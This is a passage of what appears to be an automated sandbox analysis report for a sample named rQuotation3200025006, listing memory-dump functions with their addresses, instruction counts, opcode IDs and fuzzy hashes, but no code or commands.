                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c7a43f37dfeed74e3ae9097bd3d9625d330753f658868d939469980b8536d6f
                                        • Instruction ID: 30171626b104de3932ea934e23e43e93c28b3994a87969dbb20e057fee9ed83a
                                        • Opcode Fuzzy Hash: 9c7a43f37dfeed74e3ae9097bd3d9625d330753f658868d939469980b8536d6f
                                        • Instruction Fuzzy Hash: 5C914C34E102198BDF60DF68C980B9DB7B1FF89700F208699D549BB355EB70AA85CF91
                                        Function 0693F031 Relevance: .2, Instructions: 204COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b2feeaeb2db76e943f735cf444cf8352cdccc90225dbfc42b5226576b99a6c8
                                        • Instruction ID: 76e8e733a9942508ac7e150e718234f494bdbb7809535e448799af52a0e9e2f1
                                        • Opcode Fuzzy Hash: 3b2feeaeb2db76e943f735cf444cf8352cdccc90225dbfc42b5226576b99a6c8
                                        • Instruction Fuzzy Hash: 5F711830E002199FDB54DFA9D980AAEBBF6FF84300F248529D409EB665DB30ED46CB51
                                        Function 0693F040 Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2f44a4142aa20403707b47316ebde6fc393a4d6de0ed0e0452c3088785575a0
                                        • Instruction ID: bed060479dd5c6061b41bfa01bf5ffa99b010885dfa0d7254ebbf05d5714928a
                                        • Opcode Fuzzy Hash: d2f44a4142aa20403707b47316ebde6fc393a4d6de0ed0e0452c3088785575a0
                                        • Instruction Fuzzy Hash: 54710731E002199FDB54DFA9D980AAEBBF6EF84300F248529E409EB755DB30ED46CB50
                                        Function 060B1A98 Relevance: .2, Instructions: 196COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaaabd5822f7db4bf5841de90e9dd471b1e8d3d8021deec2122fd458ac288528
                                        • Instruction ID: 0b899a4af149d12ae286b285bd7bdbff72af29b783c3fe2c0c2921481a4edee3
                                        • Opcode Fuzzy Hash: eaaabd5822f7db4bf5841de90e9dd471b1e8d3d8021deec2122fd458ac288528
                                        • Instruction Fuzzy Hash: 3E718731D102098FCB50EFA9D994ADEFBF5EF49310F10C9AAD459A7211EB34A985CB90
                                        Function 0693FCD0 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ac4f807708b0614d14f9cc57f8d03f6b2d1099c1d6c525bf9c157421b12c56e
                                        • Instruction ID: 99baa664c4b7d705a0729e0cc5f30be45c71625d1e734fc5cba1078cf875ee01
                                        • Opcode Fuzzy Hash: 0ac4f807708b0614d14f9cc57f8d03f6b2d1099c1d6c525bf9c157421b12c56e
                                        • Instruction Fuzzy Hash: AC51EF31E00225DFDF64EB78E4486AEBBB6EB84314F20887AE11AD7651DB358C45CB80
                                        Function 0693FA70 Relevance: .2, Instructions: 170COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 552fb06e36dd4732758fdf9208839cf80856acebc16895bc664495c90039c875
                                        • Instruction ID: 914b6759252a1d9df9ac432ea1ba12807c88ac193721649a5bf13e251081a528
                                        • Opcode Fuzzy Hash: 552fb06e36dd4732758fdf9208839cf80856acebc16895bc664495c90039c875
                                        • Instruction Fuzzy Hash: 2651EA70F602149FEFA4567CD954B3F266ED789310F30482AE50ED7798CA39CC4583A2
                                        Function 0693FA80 Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31e19a8d930fe55cc88789e5c12aaf339b55abb6ecd9a011721d8751b6b2ba12
                                        • Instruction ID: 22b5a0bfc1b21589e42853f2fce76e67186847940b5874523fb72b4a04c7b6c7
                                        • Opcode Fuzzy Hash: 31e19a8d930fe55cc88789e5c12aaf339b55abb6ecd9a011721d8751b6b2ba12
                                        • Instruction Fuzzy Hash: C351C970F602149FEFA4566CD954B3F266FD789310F30482AE50ED7798CA79CC4547A2
                                        Function 06935530 Relevance: .1, Instructions: 126COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09aa3f1d298e1e00b9db120ab3cd20a71638c59b0d22c024a97745fe68dd2bc4
                                        • Instruction ID: f2620e10f211c0a700e28932a2c56f39f01f24ea6f3780798a1e919e62011c12
                                        • Opcode Fuzzy Hash: 09aa3f1d298e1e00b9db120ab3cd20a71638c59b0d22c024a97745fe68dd2bc4
                                        • Instruction Fuzzy Hash: 37416F71E006198FDF70CEA9D880AAFF7F6FB88314F21492AE116D7A54D730E8558B90
                                        Function 0693DA90 Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d2cdeac276fa7b25acd8b8e5fa7c20a7b0ba289695f91538f107624da820de2
                                        • Instruction ID: f247786b6f149f83c5259944800225708b5f5d3140456fde35e5c813af891b4b
                                        • Opcode Fuzzy Hash: 7d2cdeac276fa7b25acd8b8e5fa7c20a7b0ba289695f91538f107624da820de2
                                        • Instruction Fuzzy Hash: A331A330E1061A9FDF55DF69C95068EFBB5EF85310F244929E405EB740EB70A94A8B81
                                        Function 060B1325 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40ef68b085349ef19f5dadb043be5f7e78299a579fb413e15a4098dab3bd0050
                                        • Instruction ID: c20f4c8a92ef1dd42a99ab7b6afb2f109713349016c14fd2706c66b6dbc47796
                                        • Opcode Fuzzy Hash: 40ef68b085349ef19f5dadb043be5f7e78299a579fb413e15a4098dab3bd0050
                                        • Instruction Fuzzy Hash: E441E3B1D00309DFDB50CF99C984ACEBFB5AF48304F248469D808BB215D7756A45CF90
                                        Function 060B1330 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 722ac46c0f39aef82394a2fae82b0ed8591ba9b9c28240e30c0f8150b63baa49
                                        • Instruction ID: bfda4cdcedcf013bf56d6cc7173182de090620f7da3c6c73968965abdcd27abc
                                        • Opcode Fuzzy Hash: 722ac46c0f39aef82394a2fae82b0ed8591ba9b9c28240e30c0f8150b63baa49
                                        • Instruction Fuzzy Hash: 4B41C0B1D003099FDB64CFA9C984ADEBFB5AF48304F248469D808AB215D7756A4ACF90
                                        Function 06932081 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b93031ee356ce29c07cce16d5b7e075a46e029b2b0979455df549d7a4293838
                                        • Instruction ID: 57d97e1eb7ca98d84e2c128e25f7264794bf0d56dfc47efb07d5c7991958ae5e
                                        • Opcode Fuzzy Hash: 8b93031ee356ce29c07cce16d5b7e075a46e029b2b0979455df549d7a4293838
                                        • Instruction Fuzzy Hash: 32319A34E106159BCB45DFA4D99469EBBF2BF89300F208829E906E7750DB31ED46CB40
                                        Function 06932090 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85a6b7246a53e9d52485ec309a2d0464b7541cf846ef71effd292208747c562d
                                        • Instruction ID: ab1f8499d89e7a17575fe052e173f6545e2e76f098da04574f5eb6d9e052ef57
                                        • Opcode Fuzzy Hash: 85a6b7246a53e9d52485ec309a2d0464b7541cf846ef71effd292208747c562d
                                        • Instruction Fuzzy Hash: E031AC30E106199FCB09DFA5D994A9EB7F6BF89300F208829E806E7750DB71ED42CB50
                                        Function 0693A418 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0015607d34d61b8cbacadced780ff9b3941f04fa7578f9c62d148be8e8ab8422
                                        • Instruction ID: 5100526f9fa3de9c34ee71b295bc5cb58f75bd6558453171d35a7a5eae7b5ff3
                                        • Opcode Fuzzy Hash: 0015607d34d61b8cbacadced780ff9b3941f04fa7578f9c62d148be8e8ab8422
                                        • Instruction Fuzzy Hash: 7321AF30B100255FDB54EA7DE85576EB3DAEB85714F208939E24EC7794EE22EC028782
                                        Function 060B4ED9 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9442a312ec8166f6543094456e1c84ef117431271ad5bbdbbce622fd7bfc4efb
                                        • Instruction ID: 0e97f509b2bff3c19927b0c3418fc38e123ba8b37757ae159c35922183df7da9
                                        • Opcode Fuzzy Hash: 9442a312ec8166f6543094456e1c84ef117431271ad5bbdbbce622fd7bfc4efb
                                        • Instruction Fuzzy Hash: 3921AF34B002159FDB44EB79D944B6E7BEAEB88310F204839E509E3399DB36ED468791
                                        Function 06933FB9 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20aee4c2d251e572002e4baa4b38032e1029bfd93c7765c7d0f5e45648c3d75e
                                        • Instruction ID: 8dc9e900fade41f9d45e2eece9ff4bca4f6a87342e0eb3f7720ba28256702d20
                                        • Opcode Fuzzy Hash: 20aee4c2d251e572002e4baa4b38032e1029bfd93c7765c7d0f5e45648c3d75e
                                        • Instruction Fuzzy Hash: A2215572F102159FDB40DF69D880AAEBBF9FB48710F108029E905E7394E732DD418B95
                                        Function 06933FC8 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aca96e77fa6d827c4df60529f69eccc726d7c819f5d14f378246c2befce2c3a1
                                        • Instruction ID: 39a341ca2cc1d2843ce1fab51c081c59ec1edb7b700641f0042311d721ae7fc3
                                        • Opcode Fuzzy Hash: aca96e77fa6d827c4df60529f69eccc726d7c819f5d14f378246c2befce2c3a1
                                        • Instruction Fuzzy Hash: 5A218672F002259FDB50DFA9D980AAEBBF9FB48710F208029E905E7384E731DC418B91
                                        Function 060B4EE8 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f61d7a29c7a1b6e97df1a051161099faf6c85c55b86d89286916730caa1fe3d
                                        • Instruction ID: 14e9a9bd30fcd623d44ca8adfde4b393129b897463169edaadf1140c773f3048
                                        • Opcode Fuzzy Hash: 8f61d7a29c7a1b6e97df1a051161099faf6c85c55b86d89286916730caa1fe3d
                                        • Instruction Fuzzy Hash: 1C218E347002159FDB44EB79D994B6E7BEAEBC8300F204829E509E3399DB36ED46C791
                                        Function 00E3D030 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f33e0acd4dfc551f4882cce887065654a9cc32835ffc2b4c877dee8689be2a05
                                        • Instruction ID: 9d8eab647e55320901f515c652146eaa19aba9ea17dd40c81013564a2552c914
                                        • Opcode Fuzzy Hash: f33e0acd4dfc551f4882cce887065654a9cc32835ffc2b4c877dee8689be2a05
                                        • Instruction Fuzzy Hash: F521F271508204DFCB18DF14ED88B26BFA6FB84718F24C569E8095B296C37AD846CA62
                                        Function 00E3D005 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2af2347e70bebb3961301ba7dd18c871f7b1aff66999ad2767a694a986eb2143
                                        • Instruction ID: 858f8c30afe554c935a20a51b09daf44d1b75df406f37ed0ce7480c4425b003c
                                        • Opcode Fuzzy Hash: 2af2347e70bebb3961301ba7dd18c871f7b1aff66999ad2767a694a986eb2143
                                        • Instruction Fuzzy Hash: 34216D7110D7C09FC707CB24D994711BF71AF46214F29C5DBD8898F2A7C23A980ACB62
                                        Function 00E3D1F8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d972c7c93c686eb3f257e69b21eeb814e07155da359fc26b78905f59677db44
                                        • Instruction ID: 43f69d78e1617014d33b642ff1fdbce3f030c2370ba73b6fbabf9a78bebf532e
                                        • Opcode Fuzzy Hash: 1d972c7c93c686eb3f257e69b21eeb814e07155da359fc26b78905f59677db44
                                        • Instruction Fuzzy Hash: 5A2138B1508200DFDB15DF14EDC8B2BBF65FB84324F20C569E8095B266C376D846CAA1
                                        Function 00E3D3A8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50ad0239f681805111272aa1dc54d3288dcaac1556d0e9b144bbb9507d01edfe
                                        • Instruction ID: c225567cf8b99290c27df989aad05848f102e389d7fdcbf0efd2ce7b84590269
                                        • Opcode Fuzzy Hash: 50ad0239f681805111272aa1dc54d3288dcaac1556d0e9b144bbb9507d01edfe
                                        • Instruction Fuzzy Hash: B42104B1608204DFCB05DF14E9C8B26BFA5FB84318F20C56DD9095B256C376E856CA62
                                        Function 060B4A04 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bca68927b22863e62f83cc85441f5c06cfe633c3fc95dfbeceea86d4705d8b14
                                        • Instruction ID: ff1b4e13ccc03289de629a8ea78f9859a97a1d475803d268e6e83f6876637a5c
                                        • Opcode Fuzzy Hash: bca68927b22863e62f83cc85441f5c06cfe633c3fc95dfbeceea86d4705d8b14
                                        • Instruction Fuzzy Hash: AA3104B0C402189FDB50CF99C985BDEBFF5AB48314F24802AE404BB354C7B55945CFA5
                                        Function 060B43EC Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40819c333875c072be679b1b30d5f36a229b61fff3ecf8ee3402db41502705a5
                                        • Instruction ID: b24a3026aabb705664a30d24a6e8f4d4e64a5887cbec65c79c3820f45e9ee3af
                                        • Opcode Fuzzy Hash: 40819c333875c072be679b1b30d5f36a229b61fff3ecf8ee3402db41502705a5
                                        • Instruction Fuzzy Hash: 3C31F2B0D402189FDB60CF99C589BDEBFF4AB48314F20806AE404BB355C7B59944CFA5
                                        Function 00E3D118 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4158042601.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_e3d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ae3059f5530e0e8857358017a65b14e13be1980fd6c5127c2507ca6ba68ebfc
                                        • Instruction ID: ea2aa94c9015e5829cadd8c101c0231640c7a0911053c42c76a43031640cda96
                                        • Opcode Fuzzy Hash: 1ae3059f5530e0e8857358017a65b14e13be1980fd6c5127c2507ca6ba68ebfc
                                        • Instruction Fuzzy Hash: 04210471609300DFDB04DF14EDC8B26BFA5FB84318F20C56DD8095B251C336D846C6A1
                                        Function 060B1050 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a20a7c7aaeab635b990eeb3b1715e5eeda7178214fda08ebb26ec021383a5232
                                        • Instruction ID: 0b51a7b9a448935a66fe5ee445b8f15241f55abeeb02edd351a8e28953858677
                                        • Opcode Fuzzy Hash: a20a7c7aaeab635b990eeb3b1715e5eeda7178214fda08ebb26ec021383a5232
                                        • Instruction Fuzzy Hash: 2211D632E402195BCB44EFA9DC05AEFBBBAEFC5314F14C566E515E7250DB30A9058B90
                                        Function 06936E28 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0935a648b8b66ca8a13a402a5db68fed6aa12cfafe005631754bb8fcaa3da8d9
                                        • Instruction ID: 51ed54da017166242f6a86debeef60d215b7a217b4baa6f9e36aa5be271ade0f
                                        • Opcode Fuzzy Hash: 0935a648b8b66ca8a13a402a5db68fed6aa12cfafe005631754bb8fcaa3da8d9
                                        • Instruction Fuzzy Hash: 4721B131B10228AFDF94DBA9E8507AEB7F7EB84310F248425D809EB744DB31EC558B84
                                        Function 060B28A8 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee4c4fa56c8e39858f0bd00f2a2506da837d0a8a9aaed004e7bdef72892649b4
                                        • Instruction ID: f685af3ee5ad11de52775d67037faa3d7367d9e5af806d682afd6f765ef0e810
                                        • Opcode Fuzzy Hash: ee4c4fa56c8e39858f0bd00f2a2506da837d0a8a9aaed004e7bdef72892649b4
                                        • Instruction Fuzzy Hash: 0311BE716402018FC359AB29D854A9BBBE6EB84355B20893CD11A9B394DB36ED09CB94
                                        Function 069340D8 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b133cf55d16e28d991e91d8c12176bb8050acd74306b08de95c2de7d430a6344
                                        • Instruction ID: 220238718c7eeb9c401c2c8bfa31c0aa4d0b78a23fdbaf025217518918131337
                                        • Opcode Fuzzy Hash: b133cf55d16e28d991e91d8c12176bb8050acd74306b08de95c2de7d430a6344
                                        • Instruction Fuzzy Hash: A8118B32B102299FDF549A68CC14AAE73EAEBC8710F11843AD40AE7344DE259C028BD2
                                        Function 060B28B8 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3211c3b0865f142079f6c00014d4ae9a5aeba41592485f777e23a2989099426
                                        • Instruction ID: d8903d8d5432612e9cb27a0dac8cec5e1695d8861220f52772e585348189c911
                                        • Opcode Fuzzy Hash: e3211c3b0865f142079f6c00014d4ae9a5aeba41592485f777e23a2989099426
                                        • Instruction Fuzzy Hash: 93119A703002058FC359AB39D454A9BBBE6EB84354720897CD11A9B394DB36AD09CB94
                                        Function 060B0BCC Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c239b9baef82242c715c6be276e5bb836e1e10167a60d604957d1d6669913d51
                                        • Instruction ID: 9116ed052d949631ba82c5a85db3975af8d15dbb5666e4a589320d4ba9dc02fe
                                        • Opcode Fuzzy Hash: c239b9baef82242c715c6be276e5bb836e1e10167a60d604957d1d6669913d51
                                        • Instruction Fuzzy Hash: B12112B5D00349AFCB50CF9AD984ADEBFF4FB48320F14846AE919A7210C375A954CFA1
                                        Function 060B1111 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b974de5ff37aea88fa6ef7271fcbffb861a7cd0208d1b62911a16cd927d3b214
                                        • Instruction ID: 0f14d9808d80e5dcb982ab27b84020d67f2c01356c46b93348c17c77cd0d1744
                                        • Opcode Fuzzy Hash: b974de5ff37aea88fa6ef7271fcbffb861a7cd0208d1b62911a16cd927d3b214
                                        • Instruction Fuzzy Hash: DB2103B5D003499FCB10CF9AD984ADEBFF4FB48320F14841AE918A7210C379A944CFA1
                                        Function 06934310 Relevance: .1, Instructions: 54COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25d5336491ec07d5b68e97947740f105a8b48f84bfbff12fee52e0e06bb32a5e
                                        • Instruction ID: aa8906643843c58d1e8c3a80e922a30a23ce2017d215c06632f3ad7e1c852c48
                                        • Opcode Fuzzy Hash: 25d5336491ec07d5b68e97947740f105a8b48f84bfbff12fee52e0e06bb32a5e
                                        • Instruction Fuzzy Hash: 4701DF31B141200BDB64D67DE85075FABDADBCAB20F24853AF10EC7791EE26CC028386
                                        Function 0693F2B0 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
